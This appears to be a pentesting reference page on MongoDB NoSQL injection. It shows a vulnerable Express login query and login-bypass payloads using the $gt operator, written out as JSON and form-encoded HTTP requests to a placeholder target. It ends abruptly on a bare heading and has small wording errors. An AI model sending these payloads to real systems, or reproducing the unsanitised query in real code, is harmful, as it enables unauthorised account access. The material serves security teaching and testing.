MongoDB - Documentation

Link to this headingMongoDB

If the source looks like this below we have control over the JSON key variable.

app.post('/', function (req, res) { db.users.find({username: req.body.username, password: req.body.password}, function (err, users) { // TODO: handle the rest }); });

Link to this headingJSON Greater Than overwrite

Using a Normal request with the JSON body {"username": "test", "password": "abc123"} creates the correct data.

But using a Inject Request with the JSON body to {"username": {"$gt": ""}, "password": {"$gt": ""}} creates an injection

$gt is a specific property of MongoDB Objects. This is the greater than comparison function. If this is set to the black string “” then it will always return true

Example Request:

POST http://target/ HTTP/1.1 Content-Type: application/json { "username": {"$gt": ""}, "password": {"$gt": ""} }

Link to this headingForm Body Greater Than overwrite

This can be also done in regular body parameters.

Example Request:

POST http://target/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded username[$gt]=&password[$gt]=

This will overwrite the greater than function and set it to undefined.

Other Special operators